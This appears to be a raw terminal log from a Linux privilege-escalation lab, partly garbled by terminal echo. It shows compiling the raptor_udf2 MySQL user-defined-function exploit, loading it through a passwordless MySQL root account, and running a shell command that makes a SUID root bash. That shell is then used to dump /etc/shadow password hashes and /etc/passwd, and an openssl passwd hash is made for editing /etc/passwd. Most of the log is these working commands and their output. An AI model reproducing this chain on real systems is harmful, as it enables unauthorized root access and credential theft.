· 4 years ago · Feb 19, 2021, 07:26 PM
100:43:01.838902 IP (tos 0x0, ttl 64, id 24676, offset 0, flags [DF], proto TCP (6), length 68)
2 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xecc5 (correct), seq 11070:11086, ack 26747530, win 6347, options [nop,nop,TS val 3431984562 ecr 997087990], length 16: HTTP
300:43:01.854816 IP (tos 0x0, ttl 64, id 24677, offset 0, flags [DF], proto TCP (6), length 70)
4 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xf14c (correct), seq 11086:11104, ack 26747530, win 6347, options [nop,nop,TS val 3431984578 ecr 997087990], length 18: HTTP
500:43:01.854940 IP (tos 0x0, ttl 64, id 24559, offset 0, flags [DF], proto TCP (6), length 52)
6 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x855d), seq 26747530, ack 11104, win 482, options [nop,nop,TS val 997088038 ecr 3431984562], length 0
700:43:01.860901 IP (tos 0x0, ttl 64, id 24560, offset 0, flags [DF], proto TCP (6), length 62695)
8 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xfdf1), seq 26747530:26810173, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 62643: HTTP
900:43:01.861149 IP (tos 0x0, ttl 64, id 24567, offset 0, flags [DF], proto TCP (6), length 2896)
10 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe4c3), seq 26810173:26813017, ack 11104, win 482, options [nop,nop,TS val 997088044 ecr 3431984562], length 2844: HTTP
1100:43:01.861301 IP (tos 0x0, ttl 64, id 24678, offset 0, flags [DF], proto TCP (6), length 52)
12 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x9dad (correct), seq 11104, ack 26801224, win 6071, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
1300:43:01.861365 IP (tos 0x0, ttl 64, id 24679, offset 0, flags [DF], proto TCP (6), length 52)
14 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe0 (correct), seq 11104, ack 26813017, win 6003, options [nop,nop,TS val 3431984584 ecr 997088044], length 0
1500:43:01.862496 IP (tos 0x0, ttl 64, id 24568, offset 0, flags [DF], proto TCP (6), length 57210)
16 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8a56 (incorrect -> 0x8614), seq 26813017:26870175, ack 11104, win 482, options [nop,nop,TS val 997088046 ecr 3431984584], length 57158: HTTP
17^Cssh user@10.10.170.166
18
19
20
21
22
23Owner@DESKTOP-8DUSIOO ~
24$ ssh user@10.10.170.166
25ssh: connect to host 10.10.170.166 port 22: Connection timed out
26
27Owner@DESKTOP-8DUSIOO ~
28$ ssh 10.10.170.166
29The authenticity of host '10.10.170.166 (10.10.170.166)' can't be esta
30blished.
31RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjkt
32Ank.
33Are you sure you want to continue connecting (yes/no)? yes
34Warning: Permanently added '10.10.170.166' (RSA) to the list of known
35Owner@DESKTOP-8DUSIOO ~
36$ ssh 10.10.170.166
37The authenticity of host '10.10.170.166 (10.10.170.166)' can't be established.
38RSA key fingerprint is SHA256:JwwPVfqC+8LPQda0B9wFLZzXCXcoAho6s8wYGjktAnk.
39Are you sure you want to continue connecting (yes/no)? yes
40Warning: Permanently added '10.10.170.166' (RSA) to the list of known hosts.
41owner@10.10.170.166's password:
42Permission denied, please try again.
43owner@10.10.170.166's password:
44Permission denied, please try again.
45owner@10.10.170.166's password:
46$ ssh 10.10.170.1666K0s
47Owner@DESKTOP-8DUSIOO ~ostname 10.10.170.166:22: No such host is known
48$ ssh 10.10.170.1666K0ssh: Could not resolve hostn
49ame 10.10.170.166:22: No such host is known.
50Owner@DESKTOP-8DUSIOO ~
51Owner@DESKTOP-8DUSIOO ~6 22
52$ 6 22
53ser@10user@10.10.170.166's passwor
54d:
55bash: 22: command not found
56Owner@DESKTOP-8DUSIOO ~
57Owner@DESKTOP-8DUSIOO ~6 22
58$ 6 220.10.170.1
5966's puser@10.10.170.166's password:
60owner@10.10.170.166's password:
61user@10.10.170.166's password:
62Owner@DESKTOP-8DUSIOO ~ound
63$ ssh 10.10.Ku
64Owner@DESKTOP- ~
65Owner@DESKTOP-8DUSIOO ~
66$ ssh user@10.10.170.166 22
67user@10.10.170.166's password:
68bash: 22: command not found
69bash: 22: command not found
70Owner@DESKTOP-8DUSIOO ~
71$ ssh user@10.10.170.166
72$ 6 22 [-E log_file] user@10.10.170.166's configfile] [-I pkcs11]
73password:
74Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
75
76The programs included with the Debian GNU/Linux system are free software;
77the exact distribution terms for each program are described in the
78individual files in /usr/share/doc/*/copyright.
79
80Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
81permitted by applicable law.
82Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
83user@debian:~$ id
84uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plug
85dev)
86user@debian:~$ ls
87myvpn.ovpn tools
88user@debian:~$ cd tools/
89user@debian:~/tools$ ls
90kernel-exploits mysql-udf nginx privesc-scripts sudo suid
91user@debian:~/tools$ cd mysql-udf/
92user@debian:~/tools/mysql-udf$ ls
93raptor_udf2.c
94user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
95user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o raptor_udf2.so raptor_udf2
96.o -lc
97top - 20:04:48 up 11 min, 1 user, load average: 0.00, 0.07, 0.08
98Tasks: 83 total, 1 running, 82 sleeping, 0 stopped, 0 zombie
99Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
100Mem: 507168k total, 498240k used, 8928k free, 382220k buffers
101Swap: 901112k total, 0k used, 901112k free, 54236k cached
102
103 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
104 1 root 20 0 8396 812 680 S 0.0 0.2 0:01.06 init
105 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
106 3 root RT 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
107 4 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
108 5 root RT 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
109 6 root 20 0 0 0 0 S 0.0 0.0 0:00.01 events/0
110 7 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuset
111 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khelper
112 9 root 20 0 0 0 0 S 0.0 0.0 0:00.00 netns
113 10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 async/mgr
114 11 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pm
115 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
116 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenbus
117 14 root 20 0 0 0 0 S 0.0 0.0 0:00.00 sync_supers
118 15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
119 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kintegrityd/0
120 17 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kblockd/0
121 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpid
122 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_notify
123 20 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_hotplug
124 21 root 20 0 0 0 0 S 0.0 0.0 0:00.06 kseriod
125 23 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kondemand/0
126 24 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd
127 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kswapd0
128 26 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd
129 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 aio/0
130 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 crypto/0
131 165 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata/0
132 166 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata_aux
133 167 root 20 0 0 0 0 S 0.0 0.0 0:00.00 scsi_eh_0
134 168 root 20 0 0 0 0 S 0.0 0.0 0:00.01 scsi_eh_1
135 198 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kjournald
136 240 root 20 0 0 0 0 S 0.0 0.0 0:00.00 flush-202:0
137 275 root 16 -4 16784 796 380 S 0.0 0.2 0:00.34 udevd
138 425 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kpsmoused
139 932 root 18 -2 16780 720 308 S 0.0 0.1 0:00.00 udevd
140 933 root 18 -2 16780 648 236 S 0.0 0.1 0:00.00 udevd
141 1249 root 20 0 6796 756 284 S 0.0 0.1 0:00.03 dhclient
142 1279 daemon 20 0 8136 532 408 S 0.0 0.1 0:00.00 portmap
143 1311 statd 20 0 14424 896 732 S 0.0 0.2 0:00.00 rpc.statd
144 1314 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rpciod/0
145 1316 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd000
146 1317 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd001
147 1318 root 20 0 0 0 0 S 0.0 0.0 0:00.00 nfsiod
148 1325 root 20 0 27064 588 372 S 0.0 0.1 0:00.00 rpc.idmapd
149 1562 root 20 0 54336 1656 1084 S 0.0 0.3 0:00.08 rsyslogd
150 1638 root 20 0 3960 644 504 S 0.0 0.1 0:00.00 acpid
151 1672 root 20 0 71424 2896 1476 S 0.0 0.6 0:00.01 apache2
152 1675 www-data 20 0 71156 1992 596 S 0.0 0.4 0:00.00 apache2
153 1676 www-data 20 0 287m 2628 984 S 0.0 0.5 0:00.00 apache2
154 1677 www-data 20 0 287m 2644 996 S 0.0 0.5 0:00.00 apache2
155 1818 root 20 0 22468 1068 824 S 0.0 0.2 0:00.00 cron
156user@debian:~/tools/mysql-udf$ use mysql;
157-bash: use: command not found
158user@debian:~/tools/mysql-udf$ mysql -u root
159Welcome to the MySQL monitor. Commands end with ; or \g.
160Your MySQL connection id is 36
161Server version: 5.1.73-1+deb6u1 (Debian)
162
163Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
164
165Oracle is a registered trademark of Oracle Corporation and/or its
166affiliates. Other names may be trademarks of their respective
167owners.
168
169Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
170
171mysql> use mysql;
172Reading table information for completion of table and column names
173You can turn off this feature to get a quicker startup with -A
174
175Database changed
176mysql> create table foo(line blob);
177Query OK, 0 rows affected (0.00 sec)
178
179mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
180Query OK, 1 row affected (0.00 sec)
181
182mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
183Query OK, 1 row affected (0.00 sec)
184
185mysql> create function do_system returns integer soname 'raptor_udf2.so';
186Query OK, 0 rows affected (0.00 sec)
187
188mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
189+------------------------------------------------------------------+
190| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
191+------------------------------------------------------------------+
192| 0 |
193+------------------------------------------------------------------+
1941 row in set (0.00 sec)
195
196mysql> /q
197 -> exit
198 -> /quit
199 -> ^CCtrl-C -- exit!
200Aborted
201user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
202rootbash-4.1# id
203uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30
204(dip),44(video),46(plugdev),1000(user)
205rootbash-4.1# cat /etc/shadow
206root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
20717298:0:99999:7:::
208daemon:*:17298:0:99999:7:::
209bin:*:17298:0:99999:7:::
210sys:*:17298:0:99999:7:::
211sync:*:17298:0:99999:7:::
212games:*:17298:0:99999:7:::
213man:*:17298:0:99999:7:::
214lp:*:17298:0:99999:7:::
215mail:*:17298:0:99999:7:::
216news:*:17298:0:99999:7:::
217uucp:*:17298:0:99999:7:::
218proxy:*:17298:0:99999:7:::
219www-data:*:17298:0:99999:7:::
220backup:*:17298:0:99999:7:::
221list:*:17298:0:99999:7:::
222irc:*:17298:0:99999:7:::
223gnats:*:17298:0:99999:7:::
224nobody:*:17298:0:99999:7:::
225libuuid:!:17298:0:99999:7:::
226Debian-exim:!:17298:0:99999:7:::
227sshd:*:17298:0:99999:7:::
228user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
22917298:0:99999:7:::
230statd:*:17299:0:99999:7:::
231mysql:!:18133:0:99999:7:::
232rootbash-4.1# cat /etc/passwd
233root:x:0:0:root:/root:/bin/bash
234daemon:x:1:1:daemon:/usr/sbin:/bin/sh
235bin:x:2:2:bin:/bin:/bin/sh
236sys:x:3:3:sys:/dev:/bin/sh
237sync:x:4:65534:sync:/bin:/bin/sync
238games:x:5:60:games:/usr/games:/bin/sh
239man:x:6:12:man:/var/cache/man:/bin/sh
240lp:x:7:7:lp:/var/spool/lpd:/bin/sh
241mail:x:8:8:mail:/var/mail:/bin/sh
242news:x:9:9:news:/var/spool/news:/bin/sh
243uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
244proxy:x:13:13:proxy:/bin:/bin/sh
245www-data:x:33:33:www-data:/var/www:/bin/sh
246backup:x:34:34:backup:/var/backups:/bin/sh
247list:x:38:38:Mailing List Manager:/var/list:/bin/sh
248irc:x:39:39:ircd:/var/run/ircd:/bin/sh
249gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
250nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
251libuuid:x:100:101::/var/lib/libuuid:/bin/sh
252Debian-exim:x:101:103::/var/spool/exim4:/bin/false
253sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
254user:x:1000:1000:user,,,:/home/user:/bin/bash
255statd:x:103:65534::/var/lib/nfs:/bin/false
256mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
257rootbash-4.1# cat /etc/hosts
258127.0.0.1 localhost
259127.0.1.1 debian.localdomain debian
260
261# The following lines are desirable for IPv6 capable hosts
262::1 ip6-localhost ip6-loopback
263fe00::0 ip6-localnet
264ff00::0 ip6-mcastprefix
265ff02::1 ip6-allnodes
266ff02::2 ip6-allrouters
267rootbash-4.1# ls -l /etc/shadow
268-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
269rootbash-4.1# cat /etc/shadow
270root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
27117298:0:99999:7:::
272daemon:*:17298:0:99999:7:::
273bin:*:17298:0:99999:7:::
274sys:*:17298:0:99999:7:::
275sync:*:17298:0:99999:7:::
276games:*:17298:0:99999:7:::
277man:*:17298:0:99999:7:::
278lp:*:17298:0:99999:7:::
279mail:*:17298:0:99999:7:::
280news:*:17298:0:99999:7:::
281uucp:*:17298:0:99999:7:::
282proxy:*:17298:0:99999:7:::
283www-data:*:17298:0:99999:7:::
284backup:*:17298:0:99999:7:::
285list:*:17298:0:99999:7:::
286irc:*:17298:0:99999:7:::
287gnats:*:17298:0:99999:7:::
288nobody:*:17298:0:99999:7:::
289libuuid:!:17298:0:99999:7:::
290Debian-exim:!:17298:0:99999:7:::
291sshd:*:17298:0:99999:7:::
292user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
29317298:0:99999:7:::
294statd:*:17299:0:99999:7:::
295mysql:!:18133:0:99999:7:::
296rootbash-4.1# wget
297wget: missing URL
298Usage: wget [OPTION]... [URL]...
299
300Try ‘wget --help’ for more options.
301rootbash-4.1# pwd
302/home/user/tools/mysql-udf
303rootbash-4.1# ls
304raptor_udf2.c raptor_udf2.o raptor_udf2.so
305rootbash-4.1# cd ..
306rootbash-4.1# ls
307kernel-exploits mysql-udf nginx privesc-scripts sudo suid
308rootbash-4.1# cd ..
309rootbash-4.1# ls
310myvpn.ovpn tools
311rootbash-4.1# cd tools/
312rootbash-4.1# ls
313kernel-exploits mysql-udf nginx privesc-scripts sudo suid
314rootbash-4.1# cd privesc-scripts/
315rootbash-4.1# ls
316LinEnum.sh linpeas.sh lse.sh
317rootbash-4.1# john --wordlist =/usr/share/wordlists/rockyou.txt hash.txt
318login as: user
319user@10.10.170.166's password:
320Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
321
322The programs included with the Debian GNU/Linux system are free software;
323the exact distribution terms for each program are described in the
324individual files in /usr/share/doc/*/copyright.
325
326Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
327permitted by applicable law.
328Last login: Sun Jan 17 21:12:02 2021 from ip-10-9-252-16.eu-west-1.compute.inter nal
329user@debian:~$ cd /home/user/tools/mysql.udf
330-bash: cd: /home/user/tools/mysql.udf: No such file or directory
331user@debian:~$ ls
332myvpn.ovpn tools
333user@debian:~$ cd tools/
334user@debian:~/tools$ ls
335kernel-exploits mysql-udf nginx privesc-scripts sudo suid
336user@debian:~/tools$ gcc -g -c raptor_udf2.c -fPIC
337gcc: raptor_udf2.c: No such file or directory
338gcc: no input files
339user@debian:~/tools$ cd mysql-udf/
340user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
341user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -1c
342gcc: unrecognized option '-soname,'
343gcc: unrecognized option '-1c'
344user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -lc
345gcc: unrecognized option '-soname,'
346user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o rapt or_udf2.so raptor_udf2.o -lc
347user@debian:~/tools/mysql-udf$ mysql -u root
348Welcome to the MySQL monitor. Commands end with ; or \g.
349Your MySQL connection id is 37
350Server version: 5.1.73-1+deb6u1 (Debian)
351
352Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
353
354Oracle is a registered trademark of Oracle Corporation and/or its
355affiliates. Other names may be trademarks of their respective
356owners.
357
358Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
359
360mysql> use mysql;
361Reading table information for completion of table and column names
362You can turn off this feature to get a quicker startup with -A
363
364Database changed
365mysql> create table bmillakid(line blob);
366Query OK, 0 rows affected (0.00 sec)
367
368mysql> insert into bmillakid values(load_file('home/usr/tools/mysql-udf/raptor_u df2.so' ));
369Query OK, 1 row affected (0.00 sec)
370
371mysql> select * from bmillakid into dumpfile '/usr/lib/mysql/plugin/raptor_udf2. so';
372ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
373mysql> exit
374Bye
375user@debian:~/tools/mysql-udf$ who am i
376user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
377user@debian:~/tools/mysql-udf$ links
378-bash: links: command not found
379user@debian:~/tools/mysql-udf$ lynx
380-bash: lynx: command not found
381user@debian:~/tools/mysql-udf$ wget
382wget: missing URL
383Usage: wget [OPTION]... [URL]...
384
385Try ‘wget --help’ for more options.
386user@debian:~/tools/mysql-udf$ cat /etc/shadow
387root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
388daemon:*:17298:0:99999:7:::
389bin:*:17298:0:99999:7:::
390sys:*:17298:0:99999:7:::
391sync:*:17298:0:99999:7:::
392games:*:17298:0:99999:7:::
393man:*:17298:0:99999:7:::
394lp:*:17298:0:99999:7:::
395mail:*:17298:0:99999:7:::
396news:*:17298:0:99999:7:::
397uucp:*:17298:0:99999:7:::
398proxy:*:17298:0:99999:7:::
399www-data:*:17298:0:99999:7:::
400backup:*:17298:0:99999:7:::
401list:*:17298:0:99999:7:::
402irc:*:17298:0:99999:7:::
403gnats:*:17298:0:99999:7:::
404nobody:*:17298:0:99999:7:::
405libuuid:!:17298:0:99999:7:::
406Debian-exim:!:17298:0:99999:7:::
407sshd:*:17298:0:99999:7:::
408user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjw YpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
409statd:*:17299:0:99999:7:::
410mysql:!:18133:0:99999:7:::
411bmillakid:!:18645:0:99999:7:::
412user@debian:~/tools/mysql-udf$ cat /etc/passwd
413root:x:0:0:root:/root:/bin/bash
414daemon:x:1:1:daemon:/usr/sbin:/bin/sh
415bin:x:2:2:bin:/bin:/bin/sh
416sys:x:3:3:sys:/dev:/bin/sh
417sync:x:4:65534:sync:/bin:/bin/sync
418games:x:5:60:games:/usr/games:/bin/sh
419man:x:6:12:man:/var/cache/man:/bin/sh
420lp:x:7:7:lp:/var/spool/lpd:/bin/sh
421mail:x:8:8:mail:/var/mail:/bin/sh
422news:x:9:9:news:/var/spool/news:/bin/sh
423uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
424proxy:x:13:13:proxy:/bin:/bin/sh
425www-data:x:33:33:www-data:/var/www:/bin/sh
426backup:x:34:34:backup:/var/backups:/bin/sh
427list:x:38:38:Mailing List Manager:/var/list:/bin/sh
428irc:x:39:39:ircd:/var/run/ircd:/bin/sh
429gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
430nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
431libuuid:x:100:101::/var/lib/libuuid:/bin/sh
432Debian-exim:x:101:103::/var/spool/exim4:/bin/false
433sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
434user:x:1000:1000:user,,,:/home/user:/bin/bash
435statd:x:103:65534::/var/lib/nfs:/bin/false
436mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
437bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
438user@debian:~/tools/mysql-udf$ ls -la user
439ls: cannot access user: No such file or directory
440user@debian:~/tools/mysql-udf$ pwd
441/home/user/tools/mysql-udf
442user@debian:~/tools/mysql-udf$ who am i
443user pts/0 2021-01-17 21:14 (ip-10-9-252-16.eu-west-1.compute.interna l)
444user@debian:~/tools/mysql-udf$ whoami
445user
446user@debian:~/tools/mysql-udf$ ls -la /
447total 96
448drwxr-xr-x 22 root root 4096 Aug 25 2019 .
449drwxr-xr-x 22 root root 4096 Aug 25 2019 ..
450drwxr-xr-x 2 root root 4096 Aug 25 2019 bin
451drwxr-xr-x 3 root root 4096 May 12 2017 boot
452drwxr-xr-x 12 root root 2820 Jan 17 19:55 dev
453drwxr-xr-x 67 root root 4096 Jan 17 21:16 etc
454drwxr-xr-x 3 root root 4096 May 15 2017 home
455lrwxrwxrwx 1 root root 30 May 12 2017 initrd.img -> boot/initrd.img-2.6.32- 5-amd64
456drwxr-xr-x 12 root root 12288 May 14 2017 lib
457lrwxrwxrwx 1 root root 4 May 12 2017 lib64 -> /lib
458drwx------ 2 root root 16384 May 12 2017 lost+found
459drwxr-xr-x 3 root root 4096 May 12 2017 media
460drwxr-xr-x 2 root root 4096 Jun 11 2014 mnt
461drwxr-xr-x 2 root root 4096 May 12 2017 opt
462dr-xr-xr-x 96 root root 0 Jan 17 19:53 proc
463drwx------ 5 root root 4096 May 15 2020 root
464drwxr-xr-x 2 root root 4096 May 13 2017 sbin
465drwxr-xr-x 2 root root 4096 Jul 21 2010 selinux
466drwxr-xr-x 2 root root 4096 May 12 2017 srv
467drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
468drwxr-xr-x 13 root root 0 Jan 17 19:53 sys
469drwxrwxrwt 2 root root 4096 Jan 17 21:19 tmp
470drwxr-xr-x 11 root root 4096 May 13 2017 usr
471drwxr-xr-x 14 root root 4096 May 13 2017 var
472lrwxrwxrwx 1 root root 27 May 12 2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd6 4
473user@debian:~/tools/mysql-udf$ whoami
474user
475user@debian:~/tools/mysql-udf$ sudo -l
476Matching Defaults entries for user on this host:
477 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
478
479User user may run the following commands on this host:
480 (root) NOPASSWD: /usr/sbin/iftop
481 (root) NOPASSWD: /usr/bin/find
482 (root) NOPASSWD: /usr/bin/nano
483 (root) NOPASSWD: /usr/bin/vim
484 (root) NOPASSWD: /usr/bin/man
485 (root) NOPASSWD: /usr/bin/awk
486 (root) NOPASSWD: /usr/bin/less
487 (root) NOPASSWD: /usr/bin/ftp
488 (root) NOPASSWD: /usr/bin/nmap
489 (root) NOPASSWD: /usr/sbin/apache2
490 (root) NOPASSWD: /bin/more
491user@debian:~/tools/mysql-udf$ cat /etc/shadow | grep root
492root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8 r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
493user@debian:~/tools/mysql-udf$ ls -l /etc/passwd
494-rw-r--r-- 1 root root 1056 Jan 17 20:33 /etc/passwd
495user@debian:~/tools/mysql-udf$ openssl passwd l33th4x0rbr0!
496Warning: truncating password to 8 characters
4975v3Bvw7Nf6Zbs
498user@debian:~/tools/mysql-udf$
499user@debian:~/tools/mysql-udf$ 5v3Bvw7Nf6Zbs
500-bash: 5v3Bvw7Nf6Zbs: command not found
501user@debian:~/tools/mysql-udf$ nano /etc/passwd
502user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
503rootbash-4.1# su newroot
504Unknown id: newroot
505rootbash-4.1# whoami
506root
507rootbash-4.1# cat /etc/passwd
508root:x:0:0:root:/root:/bin/bash
509daemon:x:1:1:daemon:/usr/sbin:/bin/sh
510bin:x:2:2:bin:/bin:/bin/sh
511sys:x:3:3:sys:/dev:/bin/sh
512sync:x:4:65534:sync:/bin:/bin/sync
513games:x:5:60:games:/usr/games:/bin/sh
514man:x:6:12:man:/var/cache/man:/bin/sh
515lp:x:7:7:lp:/var/spool/lpd:/bin/sh
516mail:x:8:8:mail:/var/mail:/bin/sh
517news:x:9:9:news:/var/spool/news:/bin/sh
518uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
519proxy:x:13:13:proxy:/bin:/bin/sh
520www-data:x:33:33:www-data:/var/www:/bin/sh
521backup:x:34:34:backup:/var/backups:/bin/sh
522list:x:38:38:Mailing List Manager:/var/list:/bin/sh
523irc:x:39:39:ircd:/var/run/ircd:/bin/sh
524gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
525nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
526libuuid:x:100:101::/var/lib/libuuid:/bin/sh
527Debian-exim:x:101:103::/var/spool/exim4:/bin/false
528sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
529user:x:1000:1000:user,,,:/home/user:/bin/bash
530statd:x:103:65534::/var/lib/nfs:/bin/false
531mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
532bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
533rootbash-4.1# su root
534Password:
535su: Authentication failure
536rootbash-4.1# exit
537exit
538user@debian:~/tools/mysql-udf$ sudo -l
539Matching Defaults entries for user on this host:
540 env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
541
542User user may run the following commands on this host:
543 (root) NOPASSWD: /usr/sbin/iftop
544 (root) NOPASSWD: /usr/bin/find
545 (root) NOPASSWD: /usr/bin/nano
546 (root) NOPASSWD: /usr/bin/vim
547 (root) NOPASSWD: /usr/bin/man
548 (root) NOPASSWD: /usr/bin/awk
549 (root) NOPASSWD: /usr/bin/less
550 (root) NOPASSWD: /usr/bin/ftp
551 (root) NOPASSWD: /usr/bin/nmap
552 (root) NOPASSWD: /usr/sbin/apache2
553 (root) NOPASSWD: /bin/more
554user@debian:~/tools/mysql-udf$ cat /etc/crontab
555# /etc/crontab: system-wide crontab
556# Unlike any other crontab you don't have to run the `crontab'
557# command to install the new version when you edit this file
558# and files in /etc/cron.d. These files also have username fields,
559# that none of the other crontabs do.
560
561SHELL=/bin/sh
562PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
563
564# m h dom mon dow user command
56517 * * * * root cd / && run-parts --report /etc/cron.hourly
56625 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
